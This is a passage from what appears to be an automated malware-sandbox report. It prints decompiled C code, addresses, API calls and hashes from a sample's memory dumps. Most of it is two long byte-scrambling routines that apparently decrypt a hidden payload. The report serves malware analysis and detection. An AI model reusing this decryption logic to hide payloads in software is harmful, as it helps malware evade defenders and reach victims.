						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                            0x0040205c
                                                                                            0x00402066
                                                                                            0x0040206f
                                                                                            0x00402079
                                                                                            0x00402082
                                                                                            0x0040208c
                                                                                            0x00402090
                                                                                            0x00402090
                                                                                            0x00402095
                                                                                            0x004020a6
                                                                                            0x004020ae
                                                                                            0x0040218e
                                                                                            0x0040218e
                                                                                            0x00402195
                                                                                            0x004020b4
                                                                                            0x004020b4
                                                                                            0x004020c5
                                                                                            0x004020c9
                                                                                            0x004020cf
                                                                                            0x004020d9
                                                                                            0x004020db
                                                                                            0x004020e6
                                                                                            0x004020e9
                                                                                            0x004020f6
                                                                                            0x004020f8
                                                                                            0x004020fa
                                                                                            0x00402101
                                                                                            0x00402104
                                                                                            0x00402104
                                                                                            0x00402107
                                                                                            0x00402111
                                                                                            0x00402119
                                                                                            0x0040211e
                                                                                            0x0040212a
                                                                                            0x0040212a
                                                                                            0x0040212d
                                                                                            0x00402136
                                                                                            0x00402139
                                                                                            0x00402142
                                                                                            0x00402147
                                                                                            0x00402159
                                                                                            0x00402168
                                                                                            0x0040216a
                                                                                            0x00402176
                                                                                            0x00402176
                                                                                            0x00402168
                                                                                            0x00402178
                                                                                            0x0040217e
                                                                                            0x0040217e
                                                                                            0x00402181
                                                                                            0x00402187
                                                                                            0x0040218c
                                                                                            0x004021a1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040218c
                                                                                            0x00402197
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 123533781-501415292
                                                                                            • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                            • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                            • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                            • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E41B00, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (%p) -> (%i %p)
                                                                                            • API String ID: 0-1912712141
                                                                                            • Opcode ID: 02d68b06f0d334fdf59588af1c192c881dd9a791319527f748915e9f3a3f670f
                                                                                            • Instruction ID: ce42455a066be8e8a7adbae59173438c386a7e7776206b22c48293509d299f6a
                                                                                            • Opcode Fuzzy Hash: 02d68b06f0d334fdf59588af1c192c881dd9a791319527f748915e9f3a3f670f
                                                                                            • Instruction Fuzzy Hash: 60211DF5D00208EBDF04DF98E851FAE77B9EB48304F109958F9159B340EB75AA51CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45B78, Relevance: 1.6, Strings: 1, Instructions: 356COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E72E45B78(void* __ecx, intOrPtr _a4, char _a8) {
				signed int _v5;
				signed int _v12;

				_v12 = _v12 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t8 =  &_a8; // 0x72e45b64
					if(_v12 >=  *_t8) {
						break;
					}
					_v5 =  *((intOrPtr*)(_a4 + _v12));
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x6b;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = (_v5 & 0x000000ff) - 0xfa;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) - 0xa0;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xa0;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0xa4;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) + 0xfc;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x69;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0x55;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + 0xb1;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000005;
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 = (_v5 & 0x000000ff) - 0xe1;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x5b;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x64;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x3e;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 = _v5 & 0x000000ff ^ 0x00000046;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = _v5 & 0x000000ff ^ 0x00000010;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + 0x5b;
					_v5 = _v5 & 0x000000ff ^ 0x000000ea;
					_v5 = (_v5 & 0x000000ff) - 0xd3;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
					_v5 = (_v5 & 0x000000ff) - 0xd;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0xbd;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ _v12;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ 0x000000d5;
					_v5 =  ~(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) - 0x72;
					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
					_v5 = _v5 & 0x000000ff ^ 0x000000f7;
					_v5 = (_v5 & 0x000000ff) - _v12;
					_v5 =  !(_v5 & 0x000000ff);
					_v5 = (_v5 & 0x000000ff) + _v12;
					_v5 = _v5 & 0x000000ff ^ 0x000000a2;
					_v5 = (_v5 & 0x000000ff) - 0x78;
					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
					 *((char*)(_a4 + _v12)) = _v5;
					_v12 = _v12 + 1;
				}
				return _a4;
			}





                                                                                            0x72e45b7d
                                                                                            0x72e45b81
                                                                                            0x72e45b8e
                                                                                            0x72e45b91
                                                                                            0x72e45b94
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72e45ba2
                                                                                            0x72e45bac
                                                                                            0x72e45bb5
                                                                                            0x72e45bbf
                                                                                            0x72e45bd2
                                                                                            0x72e45bde
                                                                                            0x72e45be8
                                                                                            0x72e45bf4
                                                                                            0x72e45bfd
                                                                                            0x72e45c10
                                                                                            0x72e45c19
                                                                                            0x72e45c2b
                                                                                            0x72e45c35
                                                                                            0x72e45c3f
                                                                                            0x72e45c4b
                                                                                            0x72e45c5d
                                                                                            0x72e45c69
                                                                                            0x72e45c72
                                                                                            0x72e45c7c
                                                                                            0x72e45c8f
                                                                                            0x72e45c9b
                                                                                            0x72e45ca4
                                                                                            0x72e45cae
                                                                                            0x72e45cb7
                                                                                            0x72e45cc1
                                                                                            0x72e45ccb
                                                                                            0x72e45cde
                                                                                            0x72e45ce8
                                                                                            0x72e45cf4
                                                                                            0x72e45cfd
                                                                                            0x72e45d07
                                                                                            0x72e45d19
                                                                                            0x72e45d25
                                                                                            0x72e45d2e
                                                                                            0x72e45d38
                                                                                            0x72e45d41
                                                                                            0x72e45d54
                                                                                            0x72e45d5d
                                                                                            0x72e45d6f
                                                                                            0x72e45d78
                                                                                            0x72e45d81
                                                                                            0x72e45d8b
                                                                                            0x72e45d94
                                                                                            0x72e45d9e
                                                                                            0x72e45da7
                                                                                            0x72e45db1
                                                                                            0x72e45dc4
                                                                                            0x72e45dcd
                                                                                            0x72e45dd7
                                                                                            0x72e45de1
                                                                                            0x72e45df3
                                                                                            0x72e45dfd
                                                                                            0x72e45e06
                                                                                            0x72e45e0f
                                                                                            0x72e45e18
                                                                                            0x72e45e21
                                                                                            0x72e45e2a
                                                                                            0x72e45e34
                                                                                            0x72e45e3e
                                                                                            0x72e45e48
                                                                                            0x72e45e51
                                                                                            0x72e45e5b
                                                                                            0x72e45e67
                                                                                            0x72e45e73
                                                                                            0x72e45e7c
                                                                                            0x72e45e8f
                                                                                            0x72e45e99
                                                                                            0x72e45ea3
                                                                                            0x72e45ead
                                                                                            0x72e45eb6
                                                                                            0x72e45ec2
                                                                                            0x72e45ecc
                                                                                            0x72e45edf
                                                                                            0x72e45ee9
                                                                                            0x72e45ef3
                                                                                            0x72e45efd
                                                                                            0x72e45f07
                                                                                            0x72e45f1a
                                                                                            0x72e45f23
                                                                                            0x72e45f36
                                                                                            0x72e45f40
                                                                                            0x72e45f4a
                                                                                            0x72e45f5c
                                                                                            0x72e45f68
                                                                                            0x72e45f71
                                                                                            0x72e45f7b
                                                                                            0x72e45f8d
                                                                                            0x72e45f99
                                                                                            0x72e45fa3
                                                                                            0x72e45fac
                                                                                            0x72e45fb6
                                                                                            0x72e45fc2
                                                                                            0x72e45fcc
                                                                                            0x72e45fdf
                                                                                            0x72e45feb
                                                                                            0x72e45b8b
                                                                                            0x72e45b8b
                                                                                            0x72e45ff8

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d[r
                                                                                            • API String ID: 0-3256498835
                                                                                            • Opcode ID: f8eb0a368894967be9855947746d22a1467eb14519df44cc53461a21495ec7df
                                                                                            • Instruction ID: 5e1dc41603c513491d270d50ae4eb8ca15fba966d51499a98d9c589580468b45
                                                                                            • Opcode Fuzzy Hash: f8eb0a368894967be9855947746d22a1467eb14519df44cc53461a21495ec7df
                                                                                            • Instruction Fuzzy Hash: B4F1025495D2EDADDB06CBED45643FCBFB04D26102F0841CAE4E5E6283C53A934EDB25
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E45B87, Relevance: 1.6, Strings: 1, Instructions: 348COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E72E45B87() {
				void* _t489;

				L0:
				while(1) {
					L0:
					 *(_t489 - 8) =  *(_t489 - 8) + 1;
					L1:
					_t4 = _t489 + 0xc; // 0x72e45b64
					if( *(_t489 - 8) <  *_t4) {
						L2:
						 *(_t489 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t489 + 8)) +  *(_t489 - 8)));
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) -  *(_t489 - 8);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0x6b;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t489 - 1) & 0x000000ff) << 0x00000005;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xfa;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xa0;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t489 - 1) & 0x000000ff) << 0x00000003;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t489 - 1) & 0x000000ff) << 0x00000007;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0xa0;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t489 - 1) & 0x000000ff) << 0x00000007;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xa4;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t489 - 1) & 0x000000ff) << 0x00000006;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0xfc;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0x69;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0x55;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t489 - 1) & 0x000000ff) << 0x00000005;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0xb1;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x00000005;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t489 - 1) & 0x000000ff) << 0x00000007;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xe1;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0x5b;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t489 - 1) & 0x000000ff) << 0x00000006;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t489 - 1) & 0x000000ff) << 0x00000007;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0x64;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) -  *(_t489 - 8);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0x3e;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t489 - 1) & 0x000000ff) << 0x00000003;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) -  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x00000046;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t489 - 1) & 0x000000ff) << 0x00000001;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x00000010;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) + 0x5b;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x000000ea;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xd3;
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t489 - 1) & 0x000000ff) << 0x00000006;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xd;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0xbd;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000003 | ( *(_t489 - 1) & 0x000000ff) << 0x00000005;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t489 - 1) & 0x000000ff) << 0x00000003;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t489 - 1) & 0x000000ff) << 0x00000002;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^  *(_t489 - 8);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t489 - 1) & 0x000000ff) << 0x00000001;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x000000d5;
						 *(_t489 - 1) =  ~( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0x72;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t489 - 1) & 0x000000ff) << 0x00000001;
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x000000f7;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) -  *(_t489 - 8);
						 *(_t489 - 1) =  !( *(_t489 - 1) & 0x000000ff);
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) +  *(_t489 - 8);
						 *(_t489 - 1) =  *(_t489 - 1) & 0x000000ff ^ 0x000000a2;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) - 0x78;
						 *(_t489 - 1) = ( *(_t489 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t489 - 1) & 0x000000ff) << 0x00000003;
						 *((char*)( *((intOrPtr*)(_t489 + 8)) +  *(_t489 - 8))) =  *(_t489 - 1);
						continue;
					}
					L3:
					return  *((intOrPtr*)(_t489 + 8));
					L4:
				}
			}




                                                                                            0x72e45b87
                                                                                            0x72e45b87
                                                                                            0x72e45b87
                                                                                            0x72e45b8b
                                                                                            0x72e45b8e
                                                                                            0x72e45b91
                                                                                            0x72e45b94
                                                                                            0x72e45b9a
                                                                                            0x72e45ba2
                                                                                            0x72e45bac
                                                                                            0x72e45bb5
                                                                                            0x72e45bbf
                                                                                            0x72e45bd2
                                                                                            0x72e45bde
                                                                                            0x72e45be8
                                                                                            0x72e45bf4
                                                                                            0x72e45bfd
                                                                                            0x72e45c10
                                                                                            0x72e45c19
                                                                                            0x72e45c2b
                                                                                            0x72e45c35
                                                                                            0x72e45c3f
                                                                                            0x72e45c4b
                                                                                            0x72e45c5d
                                                                                            0x72e45c69
                                                                                            0x72e45c72
                                                                                            0x72e45c7c
                                                                                            0x72e45c8f
                                                                                            0x72e45c9b
                                                                                            0x72e45ca4
                                                                                            0x72e45cae
                                                                                            0x72e45cb7
                                                                                            0x72e45cc1
                                                                                            0x72e45ccb
                                                                                            0x72e45cde
                                                                                            0x72e45ce8
                                                                                            0x72e45cf4
                                                                                            0x72e45cfd
                                                                                            0x72e45d07
                                                                                            0x72e45d19
                                                                                            0x72e45d25
                                                                                            0x72e45d2e
                                                                                            0x72e45d38
                                                                                            0x72e45d41
                                                                                            0x72e45d54
                                                                                            0x72e45d5d
                                                                                            0x72e45d6f
                                                                                            0x72e45d78
                                                                                            0x72e45d81
                                                                                            0x72e45d8b
                                                                                            0x72e45d94
                                                                                            0x72e45d9e
                                                                                            0x72e45da7
                                                                                            0x72e45db1
                                                                                            0x72e45dc4
                                                                                            0x72e45dcd
                                                                                            0x72e45dd7
                                                                                            0x72e45de1
                                                                                            0x72e45df3
                                                                                            0x72e45dfd
                                                                                            0x72e45e06
                                                                                            0x72e45e0f
                                                                                            0x72e45e18
                                                                                            0x72e45e21
                                                                                            0x72e45e2a
                                                                                            0x72e45e34
                                                                                            0x72e45e3e
                                                                                            0x72e45e48
                                                                                            0x72e45e51
                                                                                            0x72e45e5b
                                                                                            0x72e45e67
                                                                                            0x72e45e73
                                                                                            0x72e45e7c
                                                                                            0x72e45e8f
                                                                                            0x72e45e99
                                                                                            0x72e45ea3
                                                                                            0x72e45ead
                                                                                            0x72e45eb6
                                                                                            0x72e45ec2
                                                                                            0x72e45ecc
                                                                                            0x72e45edf
                                                                                            0x72e45ee9
                                                                                            0x72e45ef3
                                                                                            0x72e45efd
                                                                                            0x72e45f07
                                                                                            0x72e45f1a
                                                                                            0x72e45f23
                                                                                            0x72e45f36
                                                                                            0x72e45f40
                                                                                            0x72e45f4a
                                                                                            0x72e45f5c
                                                                                            0x72e45f68
                                                                                            0x72e45f71
                                                                                            0x72e45f7b
                                                                                            0x72e45f8d
                                                                                            0x72e45f99
                                                                                            0x72e45fa3
                                                                                            0x72e45fac
                                                                                            0x72e45fb6
                                                                                            0x72e45fc2
                                                                                            0x72e45fcc
                                                                                            0x72e45fdf
                                                                                            0x72e45feb
                                                                                            0x00000000
                                                                                            0x72e45feb
                                                                                            0x72e45ff2
                                                                                            0x72e45ff8
                                                                                            0x00000000
                                                                                            0x72e45ff8

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.279513465.0000000072E45000.00000040.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                            • Associated: 00000000.00000002.279475009.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279483824.0000000072E41000.00000020.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279497203.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.279519577.0000000072E47000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d[r
                                                                                            • API String ID: 0-3256498835
                                                                                            • Opcode ID: a445deb0703624a6fd41f6fbbfc39e5211919d9f1bb8fc1ecd742ac3d321b954
                                                                                            • Instruction ID: ceabb5f715afa8c3b33d504b8f5cc1cb0714c67dfde535de6ea01700c7126d83
                                                                                            • Opcode Fuzzy Hash: a445deb0703624a6fd41f6fbbfc39e5211919d9f1bb8fc1ecd742ac3d321b954
                                                                                            • Instruction Fuzzy Hash: BBF1005495D2E9ADDB06CBEE45643FCBFB04D26102F0841DAE0E5E6283C53A938EDB25
                                                                                            Uniqueness

